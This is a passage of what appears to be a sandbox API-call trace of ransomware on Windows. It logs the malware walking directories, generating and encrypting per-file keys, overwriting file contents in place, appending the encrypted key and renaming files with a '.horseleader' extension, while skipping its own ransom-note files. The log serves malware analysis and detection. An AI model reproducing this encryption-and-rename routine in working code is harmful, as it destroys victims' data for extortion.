QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.780] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.780] CloseHandle (hObject=0x158) returned 1 [0247.781] GetProcessHeap () returned 0x780000 [0247.781] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.781] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RMNSQUE", cAlternateFileName="")) returned 1 [0247.781] lstrcmpiW (lpString1="RMNSQUE", lpString2="Windows") returned -1 [0247.781] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE") returned 67 [0247.781] lstrcmpW (lpString1="RMNSQUE", lpString2=".") returned 1 [0247.781] lstrcmpW (lpString1="RMNSQUE", lpString2="..") returned 1 [0247.781] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.781] GetProcessHeap () returned 0x780000 [0247.781] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.781] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*") returned 69 [0247.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.782] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.782] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\.") returned 69 [0247.782] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.782] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.782] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.782] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\..") returned 70 [0247.782] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.782] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.783] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.783] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.783] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 79 [0247.783] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.783] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.783] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.783] lstrlenW (lpString=".testttjffg") returned 11 [0247.783] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.783] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.783] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.784] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 79 [0247.784] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.784] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=4100) returned 1 [0247.784] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1004, lpOverlapped=0x0) returned 1 [0247.787] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffeffc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.787] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1004, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1004, lpOverlapped=0x0) returned 1 [0247.787] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.787] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.788] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.788] CloseHandle (hObject=0x1a4) returned 1 [0247.788] GetProcessHeap () returned 0x780000 [0247.788] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.788] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.horseleader") returned 91 [0247.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.horseleader")) returned 1 [0247.790] GetProcessHeap () returned 0x780000 [0247.790] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.790] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x225d7800, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d2019f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x225d7800, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x11e37, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RMNSQUE.ELM", cAlternateFileName="")) returned 1 [0247.790] lstrcmpiW (lpString1="RMNSQUE.ELM", lpString2="Windows") returned -1 [0247.790] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM") returned 79 [0247.790] StrStrIW (lpFirst="RMNSQUE.ELM", lpSrch=".horseleader") returned 0x0 [0247.790] lstrcmpW (lpString1="RMNSQUE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.790] lstrcmpW (lpString1="RMNSQUE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.790] lstrlenW (lpString=".testttjffg") returned 11 [0247.790] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.790] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.790] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.791] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM") returned 79 [0247.791] StrStrW (lpFirst="RMNSQUE.ELM", lpSrch=".txt") returned 0x0 [0247.792] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=73271) returned 1 [0247.792] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.792] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.796] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.796] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.797] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x671b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.797] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.797] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.797] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.798] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xce37, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.798] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.798] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.798] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.799] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.799] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.799] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.799] CloseHandle (hObject=0x1a4) returned 1 [0247.800] GetProcessHeap () returned 0x780000 [0247.800] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.800] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM.horseleader") returned 91 [0247.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.elm.horseleader")) returned 1 [0247.810] GetProcessHeap () returned 0x780000 [0247.810] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.810] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a89bd50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x265, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RMNSQUE.INF", cAlternateFileName="")) returned 1 [0247.810] lstrcmpiW (lpString1="RMNSQUE.INF", lpString2="Windows") returned -1 [0247.810] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF") returned 79 [0247.810] StrStrIW (lpFirst="RMNSQUE.INF", lpSrch=".horseleader") returned 0x0 [0247.810] lstrcmpW (lpString1="RMNSQUE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.811] lstrcmpW (lpString1="RMNSQUE.INF", lpString2="_uninstalling_.png") returned 1 [0247.811] lstrlenW (lpString=".testttjffg") returned 11 [0247.811] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF", lpSrch=".testttjffg") returned 0x0 [0247.811] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.811] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.813] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF") returned 79 [0247.813] StrStrW (lpFirst="RMNSQUE.INF", lpSrch=".txt") returned 0x0 [0247.813] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=613) returned 1 [0247.813] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x265, lpOverlapped=0x0) returned 1 [0247.814] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd9b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.815] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x265, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x265, lpOverlapped=0x0) returned 1 [0247.815] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.815] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.815] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.815] CloseHandle (hObject=0x1a4) returned 1 [0247.816] GetProcessHeap () returned 0x780000 [0247.816] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.816] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF.horseleader") returned 91 [0247.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\RMNSQUE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\rmnsque.inf.horseleader")) returned 1 [0247.817] GetProcessHeap () returned 0x780000 [0247.817] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.817] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xbb5a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.817] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.817] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 80 [0247.817] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.817] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.817] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.817] lstrlenW (lpString=".testttjffg") returned 11 [0247.817] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.818] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.818] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.818] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 80 [0247.818] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.819] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47962) returned 1 [0247.819] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.822] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.822] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.823] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.823] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.824] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.824] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1b5a, lpOverlapped=0x0) returned 1 [0247.824] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe4a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.824] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1b5a, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1b5a, lpOverlapped=0x0) returned 1 [0247.824] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.825] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.825] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.825] CloseHandle (hObject=0x1a4) returned 1 [0247.825] GetProcessHeap () returned 0x780000 [0247.825] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 